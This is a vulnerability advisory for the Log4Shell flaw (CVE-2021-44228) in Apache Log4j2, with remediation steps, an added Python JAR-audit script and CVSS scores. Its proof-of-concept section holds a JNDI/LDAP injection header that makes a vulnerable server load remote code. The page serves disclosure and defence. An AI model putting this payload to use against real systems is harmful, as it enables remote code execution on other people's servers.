
CVE-2021-44228

Date: December 9, 2021

Overview

Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous releases (>2.10) this behavior can be mitigated by setting system property "log4j2.formatMsgNoLookups" to "true" or it can be mitigated in prior releases (<2.10) by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).

Details

For further details and a quick illustration of the PoC, visit - https://www.whitesourcesoftware.com/resources/blog/log4j-vulnerability-cve-2021-44228/

PoC Details

Assume a web application that uses a vulnerable Log4j version to log user-controlled input, in this case - the "X-Api-Version" header, and an attacker-controlled server which serves malicious content, in this case - an LDAP server which serves a serialized object.
As an attacker, send an HTTP request to the vulnerable application with the call to the malicious server, as seen below.
When Log4j parses the payload it will connect to the malicious server and eventually execute it.

PoC Code

GET / HTTP/1.0
X-Api-Version: ${jndi:ldap://127.0.0.1:1389/o=reference}

Affected Environments

Log4j 2.0.0 through 2.14.1

Remediation

Since the December 14 publication of CVE-2021-45046, these are the updated remediation recommendations:
Log4j 1.x mitigation: Log4j 1.x does not have Lookups so the risk is lower. Applications using Log4j 1.x are only vulnerable to this attack when they use JNDI in their configuration. A separate CVE (CVE-2021-4104) has been filed for this vulnerability.
To mitigate, audit your logging configuration to ensure it has no JMSAppender configured. Log4j 1.x configurations without JMSAppender are not impacted by this vulnerability.
Log4j 2.x mitigation: Implement one of the mitigation techniques below.
Java 8 (or later) users should upgrade to release 2.16.0.
Users requiring Java 7 should upgrade to release 2.12.2 when it becomes available.
Otherwise, remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
Note that only the log4j-core JAR file is impacted by this vulnerability. Applications using only the log4j-api JAR file without the log4j-core JAR file are not impacted by this vulnerability.
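As a defender-side companion to the remediation steps above, here is an added Python example (not code from this page, its vendor, or the Log4j project) that inspects a log4j-core JAR: it reads Implementation-Version from the manifest, classifies it against the version ranges stated on this page, and reproduces the JndiLookup.class removal in Python. The sample JAR it builds is constructed in memory as a stand-in; a real audit would open the JAR from disk.

```python
import io
import re
import zipfile

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"  # class the page says to strip
MANIFEST = "META-INF/MANIFEST.MF"


def parse_version(manifest_text):
    """Return Implementation-Version from MANIFEST.MF as an int tuple, or None."""
    m = re.search(r"^Implementation-Version:\s*([\d.]+)", manifest_text, re.MULTILINE)
    return tuple(int(p) for p in m.group(1).split(".")) if m else None


def assess_jar(jar_bytes):
    """Classify a log4j-core JAR against the version ranges this page gives."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        names = set(zf.namelist())
        manifest = zf.read(MANIFEST).decode("utf-8", "replace") if MANIFEST in names else ""
    version, has_lookup = parse_version(manifest), JNDI_LOOKUP in names
    if version is None or version < (2, 0, 0):
        status = "not log4j 2.x: if 1.x, audit configuration for JMSAppender (CVE-2021-4104)"
    elif version >= (2, 16, 0) or version in ((2, 12, 2), (2, 3, 1)):
        status = "fixed"
    elif version == (2, 15, 0):
        status = "incomplete fix (CVE-2021-45046)"
    else:
        status = "vulnerable"
    if status in ("vulnerable", "incomplete fix (CVE-2021-45046)") and not has_lookup:
        status += ", mitigated: JndiLookup removed"
    return {"version": version, "jndi_lookup_present": has_lookup, "status": status}


def remove_jndi_lookup(jar_bytes):
    """Rewrite the JAR without JndiLookup.class (same effect as the zip -d command above)."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as src, zipfile.ZipFile(out, "w") as dst:
        for info in src.infolist():
            if info.filename != JNDI_LOOKUP:
                dst.writestr(info, src.read(info.filename))
    return out.getvalue()


def make_sample_jar(version):
    """Constructed stand-in for log4j-core-<version>.jar: manifest plus a dummy class entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(MANIFEST, f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        zf.writestr(JNDI_LOOKUP, b"placeholder, not a real class file")
    return buf.getvalue()
```

Removing the class only blocks the JNDI lookup path; the page's recommendation remains to upgrade to 2.16.0 (or 2.12.2 on Java 7) where possible.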

Prevention

It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. Because of this, it is recommended to update to version 2.16.0.

Language: Java

Good to know:


Deserialization of Untrusted Data (CWE-502)
Input Validation (CWE-20)
Uncontrolled Resource Consumption ('Resource Exhaustion') (CWE-400)
Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection') (CWE-917)

Upgrade Version

Upgrade to one of the following versions:
org.apache.logging.log4j:log4j-core: 2.3.1, 2.12.2, 2.15.0
org.ops4j.pax.logging:pax-logging-log4j2: 1.11.10, 2.0.11

Base Score (CVSS v3 metrics):
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Scope (S): Changed
Confidentiality (C): High
Integrity (I): High
Availability (A): High
Base Score (CVSS v2 metrics):
Access Vector (AV): Network
Access Complexity (AC): Medium
Authentication (AU): None
Confidentiality (C): Complete
Integrity (I): Complete
Availability (A): Complete